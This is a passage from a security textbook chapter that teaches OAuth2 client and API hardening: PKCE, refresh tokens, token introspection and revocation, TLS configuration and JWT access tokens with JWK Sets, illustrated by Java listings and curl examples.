document explicitly granting permission to that app. For example, to allow your iOS app to handle requests to https://example.com/app/callback, you would publish the following JSON file to https://example.com/.well-known/apple-app-site-association:
{
  "applinks": {
    "apps": [],
    "details": [
      { "appID": "9JA89QQLNQ.com.example.myapp",
        "paths": ["/app/callback"] }]
  }
}
The appID field is the ID of your app in the Apple App Store, and paths lists the paths on the server that the app can intercept.
The process is similar for Android apps. This prevents a malicious app from claiming
the same redirect URI, which is why HTTPS redirects are recommended by the
OAuth Native Application Best Current Practice document (https://tools.ietf.org/
html/rfc8252#section-7.2).
For desktop and command-line applications, both Mac OS X and Windows sup-
port registering private-use URI schemes but not claimed HTTPS URIs at the time of
writing. For non-native apps and scripts that cannot register a private URI scheme, the
recommendation is that the application starts a temporary web server listening on the
local loopback device (that is, http://127.0.0.1) on a random port, and uses that as its
redirect URI. Once the authorization code is received from the AS, the client can shut
down the temporary web server.
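
To make this concrete, the following is a rough sketch of such a loopback listener using the JDK's built-in com.sun.net.httpserver package; error handling and the browser launch are omitted, and the /callback path is an assumption:

import com.sun.net.httpserver.HttpServer;
import java.net.InetSocketAddress;

public class LoopbackRedirect {
    public static void main(String... args) throws Exception {
        // Port 0 asks the OS to pick a random free port on the loopback device.
        var server = HttpServer.create(
                new InetSocketAddress("127.0.0.1", 0), 0);
        server.createContext("/callback", exchange -> {
            // The authorization code arrives in the query string.
            System.out.println("Callback query: " +
                    exchange.getRequestURI().getQuery());
            exchange.sendResponseHeaders(200, -1);
            exchange.close();
        });
        server.start();
        System.out.println("redirect_uri = http://127.0.0.1:" +
                server.getAddress().getPort() + "/callback");
        // ... launch the system browser with this redirect_uri, wait for
        // the code to arrive, then call server.stop(0).
    }
}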
7.3.2 Hardening code exchange with PKCE
Before the invention of claimed HTTPS redirect URIs, mobile applications using
private-use URI schemes were vulnerable to code interception by a malicious app reg-
istering the same URI scheme, as described in the previous section. To protect against
this attack, the OAuth working group developed the PKCE standard (Proof Key for
Code Exchange; https://tools.ietf.org/html/rfc7636), pronounced “pixy.” Since then,
formal analysis of the OAuth protocol has identified a few theoretical attacks against
the authorization code flow. For example, an attacker may be able to obtain a genuine
authorization code by interacting with a legitimate client and then using an XSS
attack against a victim to replace their authorization code with the attacker’s. Such
an attack would be quite difficult to pull off but is theoretically possible. It’s there-
fore recommended that all types of clients use PKCE to strengthen the authoriza-
tion code flow.
The way PKCE works for a client is quite simple. Before the client redirects the
user to the authorization endpoint, it generates another random value, known as the
PKCE code verifier. This value should be generated with high entropy, such as a 32-byte
value from a SecureRandom object in Java; the PKCE standard requires that the
encoded value is at least 43 characters long and a maximum of 128 characters from a
restricted set of characters. The client stores the code verifier locally, alongside the
state parameter. Rather than sending this value directly to the AS, the client first
hashes it using the SHA-256 cryptographic hash function to create a code challenge (listing 7.4); there is an alternative method in which the client sends the original verifier as the challenge, but this is less secure. The client then adds the code challenge as another query parameter when redirecting to the authorization endpoint.
Listing 7.4 Computing a PKCE code challenge

String addPkceChallenge(spark.Request request,
        String authorizeRequest) throws Exception {
    // Create a random code verifier string.
    var secureRandom = new java.security.SecureRandom();
    var encoder = java.util.Base64.getUrlEncoder().withoutPadding();
    var verifierBytes = new byte[32];
    secureRandom.nextBytes(verifierBytes);
    var verifier = encoder.encodeToString(verifierBytes);

    // Store the verifier in a session cookie or other local storage.
    request.session(true).attribute("verifier", verifier);

    // Create a code challenge as the SHA-256 hash of the code verifier string.
    var sha256 = java.security.MessageDigest.getInstance("SHA-256");
    var challenge = encoder.encodeToString(
            sha256.digest(verifier.getBytes("UTF-8")));

    // Include the code challenge in the redirect to the AS authorization endpoint.
    return authorizeRequest +
            "&code_challenge=" + challenge +
            "&code_challenge_method=S256";
}
Later, when the client exchanges the authorization code at the token endpoint, it
sends the original (unhashed) code verifier in the request. The AS will check that the
SHA-256 hash of the code verifier matches the code challenge that it received in the
authorization request. If they differ, then it rejects the request. PKCE is very secure,
because even if an attacker intercepts both the redirect to the AS and the redirect
back with the authorization code, they are not able to use the code because they can-
not compute the correct code verifier. Many OAuth2 client libraries will automatically
compute PKCE code verifiers and challenges for you, and it significantly improves the
security of the authorization code grant so you should always use it when possible.
Authorization servers that don’t support PKCE should ignore the additional query
parameters, because this is required by the OAuth2 standard.
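
On the AS side, the check is correspondingly simple. The following is a minimal sketch (a hypothetical helper, not part of the book's code), assuming the S256 challenge method:

import java.security.MessageDigest;
import java.util.Base64;

import static java.nio.charset.StandardCharsets.UTF_8;

class PkceVerifier {
    // Verify a code verifier against the stored S256 code challenge.
    static boolean verify(String codeVerifier, String storedChallenge)
            throws Exception {
        var sha256 = MessageDigest.getInstance("SHA-256");
        var computed = Base64.getUrlEncoder().withoutPadding()
                .encodeToString(sha256.digest(codeVerifier.getBytes(UTF_8)));
        // Constant-time comparison avoids leaking information via timing.
        return MessageDigest.isEqual(
                computed.getBytes(UTF_8),
                storedChallenge.getBytes(UTF_8));
    }
}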
7.3.3 Refresh tokens
In addition to an access token, the AS may also issue the client with a refresh token at the
same time. The refresh token is returned as another field in the JSON response from
the token endpoint, as in the following example:
$ curl -d 'grant_type=password
➥ &scope=read_messages+post_message
➥ &username=demo&password=changeit'
➥ -u test:password
➥ https://as.example.com:8443/oauth2/access_token
{
"access_token":"B9KbdZYwajmgVxr65SzL-z2Dt-4",
"refresh_token":"sBac5bgCLCjWmtjQ8Weji2mCrbI",
"scope":"post_message read_messages",
"token_type":"Bearer","expires_in":3599}
When the access token expires, the client can then use the refresh token to obtain a
fresh access token from the AS without the resource owner needing to approve the
request again. Because the refresh token is sent only over a secure channel between
the client and the AS, it’s considered more secure than an access token that might be
sent to many different APIs.
DEFINITION
A client can use a refresh token to obtain a fresh access token when
the original one expires. This allows an AS to issue short-lived access tokens
without clients having to ask the user for a new token every time it expires.
By issuing a refresh token, the AS can limit the lifetime of access tokens. This has a
minor security benefit because if an access token is stolen, then it can only be used for
a short period of time. But in practice, a lot of damage could be done even in a short
space of time by an automated attack, such as the Facebook attack discussed in chap-
ter 6 (https://newsroom.fb.com/news/2018/09/security-update/). The primary ben-
efit of refresh tokens is to allow the use of stateless access tokens such as JWTs. If the
access token is short-lived, then the client is forced to periodically refresh the token at
the AS, providing an opportunity for the token to be revoked without the AS main-
taining a large blocklist. The complexity of revocation is effectively pushed to the cli-
ent, which must now handle periodically refreshing its access tokens.
To refresh an access token, the client calls the AS token endpoint using the refresh token grant, sending the refresh token and any client credentials, as in the following example:
$ curl -d 'grant_type=refresh_token
➥ &refresh_token=sBac5bgCLCjWmtjQ8Weji2mCrbI'
➥ -u test:password
➥ https://as.example.com:8443/oauth2/access_token
{
"access_token":"snGxj86QSYB7Zojt3G1b2aXN5UM",
"scope":"post_message read_messages",
"token_type":"Bearer","expires_in":3599}
The AS can often be configured to issue a new refresh token at the same time (revok-
ing the old one), enforcing that each refresh token is used only once. This can be
used to detect refresh token theft: when the attacker uses the refresh token, it will stop
working for the legitimate client.
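
On the client side, handling rotation just means replacing the stored refresh token whenever the response includes a new one. A small illustrative sketch (the class and field are hypothetical):

import org.json.JSONObject;

class RefreshTokenHandler {
    private String refreshToken;   // illustrative local storage

    // Update stored tokens from a token endpoint response body.
    String handleResponse(String responseBody) {
        var json = new JSONObject(responseBody);
        if (json.has("refresh_token")) {
            // Rotation: the AS revoked the old refresh token,
            // so replace the stored one.
            refreshToken = json.getString("refresh_token");
        }
        return json.getString("access_token");
    }
}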
Pop quiz

4  Which type of URI should be preferred as the redirect URI for a mobile client?
   a  A claimed HTTPS URI
   b  A private-use URI scheme such as myapp://cb

5  True or False: The authorization code grant should always be used in combination with PKCE.

The answers are at the end of the chapter.
7.4 Validating an access token
Now that you’ve learned how to obtain an access token for a client, you need to
learn how to validate the token in your API. In previous chapters, it was simple to look
up a token in the local token database. For OAuth2, this is no longer quite so simple
when tokens are issued by the AS and not by the API. Although you could share a
token database between the AS and each API, this is not desirable because sharing
database access increases the risk of compromise. An attacker can try to access the
database through any of the connected systems, increasing the attack surface. If just
one API connected to the database has a SQL injection vulnerability, this would
compromise the security of all.
Originally, OAuth2 didn’t provide a solution to this problem and left it up to the
AS and resource servers to decide how to coordinate to validate tokens. This changed
with the publication of the OAuth2 Token Introspection standard (https://tools.ietf
.org/html/rfc7662) in 2015, which describes a standard HTTP endpoint on the AS
that the RS can call to validate an access token and retrieve details about its scope and
resource owner. Another popular solution is to use JWTs as the format for access
tokens, allowing the RS to locally validate the token and extract required details from
the embedded JSON claims. You’ll learn how to use both mechanisms in this section.
7.4.1 Token introspection
To validate an access token using token introspection, you simply make a POST
request to the introspection endpoint of the AS, passing in the access token as a param-
eter. You can discover the introspection endpoint using the method in section 7.2.3 if
the AS supports discovery. The AS will usually require your API (acting as the resource
server) to register as a special kind of client and receive client credentials to call the
endpoint. The examples in this section will assume that the AS requires HTTP Basic
authentication because this is the most common requirement, but you should check
the documentation for your AS to determine how the RS must authenticate.
TIP
To avoid historical issues with ambiguous character sets, OAuth requires
that HTTP Basic authentication credentials are first URL-encoded (as UTF-8)
before being Base64-encoded.
Listing 7.5 shows the constructor and imports for a new token store that will use
OAuth2 token introspection to validate an access token. You’ll implement the remain-
ing methods in the rest of this section. The create and revoke methods throw an
exception, effectively disabling the login and logout endpoints at the API, forcing
clients to obtain access tokens from the AS. The new store takes the URI of the token
introspection endpoint, along with the credentials to use to authenticate. The creden-
tials are encoded into an HTTP Basic authentication header ready to be used. Navi-
gate to src/main/java/com/manning/apisecurityinaction/token and create a new
file named OAuth2TokenStore.java. Type in the contents of listing 7.5 in your editor
and save the new file.
Listing 7.5 The OAuth2 token store

package com.manning.apisecurityinaction.token;

import org.json.JSONObject;
import spark.Request;

import java.io.IOException;
import java.net.*;
import java.net.http.*;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import java.time.Instant;
import java.time.temporal.ChronoUnit;
import java.util.*;

import static java.nio.charset.StandardCharsets.UTF_8;

public class OAuth2TokenStore implements SecureTokenStore {

    private final URI introspectionEndpoint;
    private final String authorization;
    private final HttpClient httpClient;

    // Inject the URI of the token introspection endpoint.
    public OAuth2TokenStore(URI introspectionEndpoint,
            String clientId, String clientSecret) {
        this.introspectionEndpoint = introspectionEndpoint;
        // Build up HTTP Basic credentials from the client ID and secret.
        var credentials = URLEncoder.encode(clientId, UTF_8) + ":" +
                URLEncoder.encode(clientSecret, UTF_8);
        this.authorization = "Basic " + Base64.getEncoder()
                .encodeToString(credentials.getBytes(UTF_8));
        this.httpClient = HttpClient.newHttpClient();
    }

    // Throw an exception to disable direct login and logout.
    @Override
    public String create(Request request, Token token) {
        throw new UnsupportedOperationException();
    }

    @Override
    public void revoke(Request request, String tokenId) {
        throw new UnsupportedOperationException();
    }
}
To validate a token, you then need to make a POST request to the introspection end-
point passing the token. You can use the HTTP client library in java.net.http, which
was added in Java 11 (for earlier versions, you can use Apache HttpComponents,
https://hc.apache.org/httpcomponents-client-ga/). Because the token is untrusted
before the call, you should first validate it to ensure that it conforms to the allowed
syntax for access tokens. As you learned in chapter 2, it’s important to always validate
all inputs, and this is especially important when the input will be included in a call to
another system. The standard doesn’t specify a maximum size for access tokens, but
you should enforce a limit of around 1KB or less, which should be enough for most
token formats (if the access token is a JWT, it could get quite large and you may need
to increase that limit). The token should then be URL-encoded to include in the
POST body as the token parameter. It’s important to properly encode parameters
when calling another system to prevent an attacker being able to manipulate the con-
tent of the request (see section 2.6 of chapter 2). You can also include a token_
type_hint parameter to indicate that it’s an access token, but this is optional.
TIP
To avoid making an HTTP call every time a client uses an access token
with your API, you can cache the response for a short period of time, indexed
by the token. The longer you cache the response, the longer it may take your
API to find out that a token has been revoked, so you should balance perfor-
mance against security based on your threat model.
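
For instance, a tiny cache along these lines could sit in front of the introspection call; the 60-second TTL and the data structure are illustrative choices, not from the Natter code:

import org.json.JSONObject;
import java.time.Instant;
import java.util.concurrent.ConcurrentHashMap;

class IntrospectionCache {
    private static class Entry {
        final JSONObject json;
        final Instant expiry;
        Entry(JSONObject json, Instant expiry) {
            this.json = json;
            this.expiry = expiry;
        }
    }

    private final ConcurrentHashMap<String, Entry> cache =
            new ConcurrentHashMap<>();

    // Return a cached introspection response, or null if absent or expired.
    JSONObject get(String token) {
        var entry = cache.get(token);
        if (entry == null || Instant.now().isAfter(entry.expiry)) {
            cache.remove(token);
            return null;
        }
        return entry.json;
    }

    // Cache for at most 60 seconds to bound the revocation delay.
    void put(String token, JSONObject json) {
        cache.put(token, new Entry(json, Instant.now().plusSeconds(60)));
    }
}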
If the introspection call is successful, the AS will return a JSON response indicating
whether the token is valid and metadata about the token, such as the resource owner
and scope. The only required field in this response is a Boolean active field, which
indicates whether the token should be considered valid. If this is false then the token
should be rejected, as in listing 7.6. You’ll process the rest of the JSON response
shortly, but for now open OAuth2TokenStore.java in your editor again and add the
implementation of the read method from the listing.
Listing 7.6 Introspecting an access token

@Override
public Optional<Token> read(Request request, String tokenId) {
    // Validate the token first.
    if (!tokenId.matches("[\\x20-\\x7E]{1,1024}")) {
        return Optional.empty();
    }
    // Encode the token into the POST form body.
    var form = "token=" + URLEncoder.encode(tokenId, UTF_8) +
            "&token_type_hint=access_token";
    // Call the introspection endpoint using your client credentials.
    var httpRequest = HttpRequest.newBuilder()
            .uri(introspectionEndpoint)
            .header("Content-Type", "application/x-www-form-urlencoded")
            .header("Authorization", authorization)
            .POST(BodyPublishers.ofString(form))
            .build();

    try {
        var httpResponse = httpClient.send(httpRequest,
                BodyHandlers.ofString());
        if (httpResponse.statusCode() == 200) {
            var json = new JSONObject(httpResponse.body());
            // Check that the token is still active.
            if (json.getBoolean("active")) {
                return processResponse(json);
            }
        }
    } catch (IOException e) {
        throw new RuntimeException(e);
    } catch (InterruptedException e) {
        Thread.currentThread().interrupt();
        throw new RuntimeException(e);
    }
    return Optional.empty();
}
Several optional fields are allowed in the JSON response, including all valid JWT
claims (see chapter 6). The most important fields are listed in table 7.1. Because all
these fields are optional, you should be prepared for them to be missing. This is an
unfortunate aspect of the specification, because there is often no alternative but to
reject a token if its scope or resource owner cannot be established. Thankfully, most
AS software generates sensible values for these fields.
Table 7.1 Token introspection response fields

Field      Description
scope      The scope of the token as a string. If multiple scopes are
           specified then they are separated by spaces, such as
           "read_messages post_message".
sub        An identifier for the resource owner (subject) of the token.
           This is a unique identifier, not necessarily human-readable.
username   A human-readable username for the resource owner.
client_id  The ID of the client that requested the token.
exp        The expiry time of the token, in seconds from the UNIX epoch.

Listing 7.7 shows how to process the remaining JSON fields by extracting the resource owner from the sub field, the expiry time from the exp field, and the scope from the scope field. You can also extract other fields of interest, such as the client_id, which can be useful information to add to audit logs. Open OAuth2TokenStore.java again and add the processResponse method from the listing.
Listing 7.7 Processing the introspection response

private Optional<Token> processResponse(JSONObject response) {
    // Extract token attributes from the relevant fields in the response.
    var expiry = Instant.ofEpochSecond(response.getLong("exp"));
    var subject = response.getString("sub");
    var token = new Token(expiry, subject);
    token.attributes.put("scope", response.getString("scope"));
    token.attributes.put("client_id",
            response.optString("client_id"));
    return Optional.of(token);
}
Although you used the sub field to extract an ID for the user, this may not always be
appropriate. The authenticated subject of a token needs to match the entries in the
users and permissions tables in the database that define the access control lists for
Natter social spaces. If these don’t match, then the requests from a client will be
denied even if they have a valid access token. You should check the documentation for
your AS to see which field to use to match your existing user IDs.
You can now switch the Natter API to use OAuth2 access tokens by changing the
TokenStore in Main.java to use the OAuth2TokenStore, passing in the URI of your
AS’s token introspection endpoint and the client ID and secret that you registered for
the Natter API (see appendix A for instructions):
var introspectionEndpoint =
    URI.create("https://as.example.com:8443/oauth2/introspect");
// Construct the token store, pointing at your AS.
SecureTokenStore tokenStore = new OAuth2TokenStore(
    introspectionEndpoint, clientId, clientSecret);
var tokenController = new TokenController(tokenStore);
You should make sure that the AS and the API have the same users and that the AS
communicates the username to the API in the sub or username fields from the intro-
spection response. Otherwise, the API may not be able to match the username
returned from token introspection to entries in its access control lists (chapter 3). In
many corporate environments, the users will not be stored in a local database but
instead in a shared LDAP directory that is maintained by a company’s IT department
that both the AS and the API have access to, as shown in figure 7.7.
In other cases, the AS and the API may have different user databases that use dif-
ferent username formats. In this case, the API will need some logic to map the user-
name returned by token introspection into a username that matches its local database
and ACLs. For example, if the AS returns the email address of the user, then this
could be used to search for a matching user in the local user database. In more loosely
coupled architectures, the API may rely entirely on the information returned from
the token introspection endpoint and not have access to a user database at all.
Figure 7.7 In many environments, the AS and the API will both have access to a corporate LDAP directory containing details of all users. In this case, the AS needs to communicate the username to the API so that it can find the matching user entry in LDAP and in its own access control lists.
Once the AS and the API are on the same page about usernames, you can obtain an
access token from the AS and use it to access the Natter API, as in the following exam-
ple using the ROPC grant:
$ curl -u test:password \
-d 'grant_type=password&scope=create_space+post_message
➥ &username=demo&password=changeit' \
https://openam.example.com:8443/openam/oauth2/access_token
{"access_token":"_Avja0SO-6vAz-caub31eh5RLDU",
"scope":"post_message create_space",
"token_type":"Bearer","expires_in":3599}
$ curl -H 'Content-Type: application/json' \
-H 'Authorization: Bearer _Avja0SO-6vAz-caub31eh5RLDU' \
-d '{"name":"test","owner":"demo"}' https://localhost:4567/spaces
{"name":"test","uri":"/spaces/1"}
Attempting to perform an action that is not allowed by the scope of the access token
will result in a 403 Forbidden error due to the access control filters you added at the
start of this chapter:
$ curl -i -H 'Authorization: Bearer _Avja0SO-6vAz-caub31eh5RLDU' \
https://localhost:4567/spaces/1/messages
HTTP/1.1 403 Forbidden
Date: Mon, 01 Jul 2019 10:22:17 GMT
WWW-Authenticate: Bearer
➥ error="insufficient_scope",scope="list_messages"

The error message tells the client the scope it requires.
7.4.2 Securing the HTTPS client configuration
Because the API relies entirely on the AS to tell it if an access token is valid, and the
scope of access it should grant, it’s critical that the connection between the two be
secure. While this connection should always be over HTTPS, the default connection
settings used by Java are not as secure as they could be:
- The default settings trust server certificates signed by any of the main public certificate authorities (CAs). Typically, the AS will be running on your own internal network and issued with a certificate by a private CA for your organization, so it's unnecessary to trust all of these public CAs.
- The default TLS settings include a wide variety of cipher suites and protocol versions for maximum compatibility. Older versions of TLS, and some cipher suites, have known security weaknesses that should be avoided where possible. You should disable these less secure options and re-enable them only if you must talk to an old server that cannot be upgraded.
The latest and most secure version of TLS is version 1.3, which was released in August
2018. This replaced TLS 1.2, released exactly a decade earlier. While TLS 1.3 is a sig-
nificant improvement over earlier versions of the protocol, it’s not yet so widely
adopted that support for TLS 1.2 can be dropped completely. TLS 1.2 is still a very
secure protocol, but for maximum security you should prefer cipher suites that offer forward secrecy and avoid older algorithms that use AES in CBC mode, because these are more prone to attacks. Mozilla provides recommendations for secure TLS configuration options (https://wiki.mozilla.org/Security/Server_Side_TLS), along with a tool for automatically generating configuration files for various web servers, load balancers, and reverse proxies. The configuration used in this section is based on Mozilla's Intermediate settings. If you know that your AS software is capable of TLS 1.3, then you could opt for the Modern settings and remove the TLS 1.2 support.

TLS cipher suites
A TLS cipher suite is a collection of cryptographic algorithms that work together to create the secure channel between a client and a server. When a TLS connection is first established, the client and server perform a handshake, in which the server authenticates to the client, the client optionally authenticates to the server, and they agree upon a session key to use for subsequent messages. The cipher suite specifies the algorithms to be used for authentication, key exchange, and the block cipher and mode of operation to use for encrypting messages. The cipher suite to use is negotiated as the first part of the handshake.

For example, the TLS 1.2 cipher suite TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 specifies that the two parties will use the Elliptic Curve Diffie-Hellman (ECDH) key agreement algorithm (using ephemeral keys, indicated by the final E), with RSA signatures for authentication, and the agreed session key will be used to encrypt messages using AES in Galois/Counter Mode. (SHA-256 is used as part of the key agreement.)

In TLS 1.3, cipher suites only specify the block cipher and hash function used, such as TLS_AES_128_GCM_SHA256. The key exchange and authentication algorithms are negotiated separately.
DEFINITION
A cipher suite offers forward secrecy if the confidentiality of data
transmitted using that cipher suite is protected even if one or both of the par-
ties are compromised afterwards. All cipher suites provide forward secrecy in
TLS 1.3. In TLS 1.2, these cipher suites start with TLS_ECDHE_ or TLS_DHE_.
To configure the connection to trust only the CA that issued the server certificate used
by your AS, you need to create a javax.net.ssl.TrustManager that has been initial-
ized with a KeyStore that contains only that one CA certificate. For example, if you’re
using the mkcert utility from chapter 3 to generate the certificate for your AS, then
you can use the following command to import the root CA certificate into a keystore:
$ keytool -import -keystore as.example.com.ca.p12 \
-alias ca -file "$(mkcert -CAROOT)/rootCA.pem"
This will ask you whether you want to trust the root CA certificate and then ask you for
a password for the new keystore. Accept the certificate and type in a suitable password,
then copy the generated keystore into the Natter project root directory.
Certificate chains
When configuring the trust store for your HTTPS client, you could choose to directly
trust the server certificate for that server. Although this seems more secure, it means
that whenever the server changes its certificate, the client would need to be updated
to trust the new one. Many server certificates are valid for only 90 days. If the server
is ever compromised, then the client will continue trusting the compromised certifi-
cate until it’s manually updated to remove it from the trust store.
To avoid these problems, the server certificate is signed by a CA, which itself has a
(self-signed) certificate. When a client connects to the server it receives the server’s
current certificate during the handshake. To verify this certificate is genuine, it looks
up the corresponding CA certificate in the client trust store and checks that the server
certificate was signed by that CA and is not expired or revoked.
In practice, the server certificate is often not signed directly by the CA. Instead, the
CA signs certificates for one or more intermediate CAs, which then sign server certif-
icates. The client may therefore have to verify a chain of certificates until it finds a
certificate of a root CA that it trusts directly. Because CA certificates might themselves be revoked or expire, in general the client may have to consider multiple possible certificate chains before it finds a valid one. Verifying a certificate chain is complex and error-prone with many subtle details so you should always use a mature library to do this.
In Java, overall TLS settings can be configured explicitly using the javax.net.ssl.SSLParameters class (listing 7.8); recall from chapter 3 that earlier versions of TLS were called SSL, and this terminology is still widespread. First construct a new instance of the class, and then use the setter methods such as setProtocols(String[]) and setCipherSuites(String[]) to specify the allowed TLS versions and cipher suites. The configured parameters can then be passed when building the HttpClient object. Open OAuth2TokenStore.java in your editor and update the constructor to configure secure TLS settings.
Listing 7.8 Securing the HTTPS connection

import javax.net.ssl.*;
import java.io.FileInputStream;
import java.security.*;
import java.net.http.*;

// Allow only TLS 1.2 or TLS 1.3.
var sslParams = new SSLParameters();
sslParams.setProtocols(
        new String[] { "TLSv1.3", "TLSv1.2" });
// Configure secure cipher suites for TLS 1.3 . . .
sslParams.setCipherSuites(new String[] {
        "TLS_AES_128_GCM_SHA256",
        "TLS_AES_256_GCM_SHA384",
        "TLS_CHACHA20_POLY1305_SHA256",
        // . . . and for TLS 1.2.
        "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
        "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
        "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
        "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
        "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256",
        "TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256"
});
sslParams.setUseCipherSuitesOrder(true);
sslParams.setEndpointIdentificationAlgorithm("HTTPS");
try {
    // The SSLContext should be configured to trust only
    // the CA used by your AS.
    var trustedCerts = KeyStore.getInstance("PKCS12");
    trustedCerts.load(
            new FileInputStream("as.example.com.ca.p12"),
            "changeit".toCharArray());
    var tmf = TrustManagerFactory.getInstance("PKIX");
    tmf.init(trustedCerts);
    var sslContext = SSLContext.getInstance("TLS");
    sslContext.init(null, tmf.getTrustManagers(), null);
    // Initialize the HttpClient with the chosen TLS parameters.
    this.httpClient = HttpClient.newBuilder()
            .sslParameters(sslParams)
            .sslContext(sslContext)
            .build();
} catch (GeneralSecurityException | IOException e) {
    throw new RuntimeException(e);
}
7.4.3 Token revocation
Just as for token introspection, there is an OAuth2 standard for revoking an access
token (https://tools.ietf.org/html/rfc7009). While this could be used to implement
the revoke method in the OAuth2TokenStore, the standard only allows the client that
was issued a token to revoke it, so the RS (the Natter API in this case) cannot revoke a
token on behalf of a client. Clients should directly call the AS to revoke a token, just as
they do to get an access token in the first place.
Revoking a token follows the same pattern as token introspection: the client makes
a POST request to a revocation endpoint at the AS, passing in the token in the request
body, as shown in listing 7.9. The client should include its client credentials to authen-
ticate the request. Only an HTTP status code is returned, so there is no need to parse
the response body.
Listing 7.9 Revoking an OAuth access token

package com.manning.apisecurityinaction;

import java.net.*;
import java.net.http.*;
import java.net.http.HttpResponse.BodyHandlers;
import java.util.Base64;

import static java.nio.charset.StandardCharsets.UTF_8;

public class RevokeAccessToken {
    private static final URI revocationEndpoint =
        URI.create("https://as.example.com:8443/oauth2/token/revoke");

    public static void main(String...args) throws Exception {
        if (args.length != 3) {
            throw new IllegalArgumentException(
                "RevokeAccessToken clientId clientSecret token");
        }
        var clientId = args[0];
        var clientSecret = args[1];
        var token = args[2];

        // Encode the client's credentials for Basic authentication.
        var credentials = URLEncoder.encode(clientId, UTF_8) +
            ":" + URLEncoder.encode(clientSecret, UTF_8);
        var authorization = "Basic " + Base64.getEncoder()
            .encodeToString(credentials.getBytes(UTF_8));

        var httpClient = HttpClient.newHttpClient();

        // Create the POST body using URL-encoding for the token.
        var form = "token=" + URLEncoder.encode(token, UTF_8) +
            "&token_type_hint=access_token";

        // Include the client credentials in the revocation request.
        var httpRequest = HttpRequest.newBuilder()
            .uri(revocationEndpoint)
            .header("Content-Type",
                "application/x-www-form-urlencoded")
            .header("Authorization", authorization)
            .POST(HttpRequest.BodyPublishers.ofString(form))
            .build();

        httpClient.send(httpRequest, BodyHandlers.discarding());
    }
}
Pop quiz

6  Which standard endpoint is used to determine if an access token is valid?
   a  The access token endpoint
   b  The authorization endpoint
   c  The token revocation endpoint
   d  The token introspection endpoint

7  Which parties are allowed to revoke an access token using the standard revocation endpoint?
   a  Anyone
   b  Only a resource server
   c  Only the client the token was issued to
   d  A resource server or the client the token was issued to

The answers are at the end of the chapter.

7.4.4 JWT access tokens
Though token introspection solves the problem of how the API can determine if an
access token is valid and the scope associated with that token, it has a downside: the
API must make a call to the AS every time it needs to validate a token. An alternative is
to use a self-contained token format such as JWTs that were covered in chapter 6. This
allows the API to validate the access token locally without needing to make an HTTPS
call to the AS. While there is not yet a standard for JWT-based OAuth2 access tokens
(although one is being developed; see http://mng.bz/5pW4), it’s common for an AS
to support this as an option.
To validate a JWT-based access token, the API needs to first authenticate the JWT
using a cryptographic key. In chapter 6, you used symmetric HMAC or authenticated
encryption algorithms in which the same key is used to both create and verify mes-
sages. This means that any party that can verify a JWT is also able to create one that
will be trusted by all other parties. Although this is suitable when the API and AS exist
within the same trust boundary, it becomes a security risk when the APIs are in differ-
ent trust boundaries. For example, if the AS is in a different datacenter to the API, the
key must now be shared between those two datacenters. If there are many APIs that
need access to the shared key, then the security risk increases even further because an
attacker that compromises any API can then create access tokens that will be accepted
by all of them.
To avoid these problems, the AS can switch to public key cryptography using digi-
tal signatures, as shown in figure 7.8. Rather than having a single shared key, the AS
instead has a pair of keys: a private key and a public key. The AS can sign a JWT using
the private key, and then anybody with the public key can verify that the signature is
genuine. However, the public key cannot be used to create a new signature and so it’s
safe to share the public key with any API that needs to validate access tokens. For this
reason, public key cryptography is also known as asymmetric cryptography, because the
holder of a private key can perform different operations to the holder of a public key.
Given that only the AS needs to create new access tokens, using public key cryptogra-
phy for JWTs enforces the principle of least authority (POLA; see chapter 2) as it
ensures that APIs can only verify access tokens and not create new ones.
TIP
Although public key cryptography is more secure in this sense, it’s also
more complicated with more ways to fail. Digital signatures are also much
slower than HMAC and other symmetric algorithms—typically 10–100x slower
for equivalent security.
Figure 7.8 When using JWT-based access tokens, the AS signs the JWT using a private key that is known only to the AS. The API can retrieve a corresponding public key from the AS to verify that the JWT is genuine. The public key cannot be used to create a new JWT, ensuring that access tokens can be issued only by the AS.
RETRIEVING THE PUBLIC KEY
The API can be directly configured with the public key of the AS. For example, you
could create a keystore that contains the public key, which the API can read when it
first starts up. Although this will work, it has some disadvantages:
- A Java keystore can only contain certificates, not raw public keys, so the AS would need to create a self-signed certificate purely to allow the public key to be imported into the keystore. This adds complexity that would not otherwise be required.
- If the AS changes its public key, which is recommended, then the keystore will need to be manually updated to list the new public key and remove the old one. Because some access tokens using the old key may still be in use, the keystore may have to list both public keys until those old tokens expire. This means that two manual updates need to be performed: one to add the new public key, and a second update to remove the old public key when it's no longer needed.
Although you could use X.509 certificate chains to establish trust in a key via a certifi-
cate authority, just as for HTTPS in section 7.4.2, this would require the certificate
chain to be attached to each access token JWT (using the standard x5c header
described in chapter 6). This would increase the size of the access token beyond rea-
sonable limits—a certificate chain can be several kilobytes in size. Instead, a common
solution is for the AS to publish its public key in a JSON document known as a JWK
Set (https://tools.ietf.org/html/rfc7517). An example JWK Set is shown in listing 7.10
and consists of a JSON object with a single keys attribute, whose value is an array of
JSON Web Keys (see chapter 6). The API can periodically fetch the JWK Set from an
HTTPS URI provided by the AS. The API can trust the public keys in the JWK Set
because they were retrieved over HTTPS from a trusted URI, and that HTTPS con-
nection was authenticated using the server certificate presented during the TLS
handshake.
{"keys": [
{
"kty": "EC",
"kid": "I4x/IijvdDsUZMghwNq2gC/7pYQ=",
"use": "sig",
"x": "k5wSvW_6JhOuCj-9PdDWdEA4oH90RSmC2GTliiUHAhXj6rmTdE2S-
➥ _zGmMFxufuV",
"y": "XfbR-tRoVcZMCoUrkKtuZUIyfCgAy8b0FWnPZqevwpdoTzGQBOXSN
➥ i6uItN_o4tH",
"crv": "P-384",
"alg": "ES384"
},
{
"kty": "RSA",
"kid": "wU3ifIIaLOUAReRB/FG6eM1P1QM=",
"use": "sig",
Listing 7.10
An example JWK Set
The JWK Set has a “keys” attribute,
which is an array of JSON Web Keys.
An elliptic
curve
public key
An RSA
public key
252
CHAPTER 7
OAuth2 and OpenID Connect
"n": "10iGQ5l5IdqBP1l5wb5BDBZpSyLs4y_Um-kGv_se0BkRkwMZavGD_Nqjq8x3-
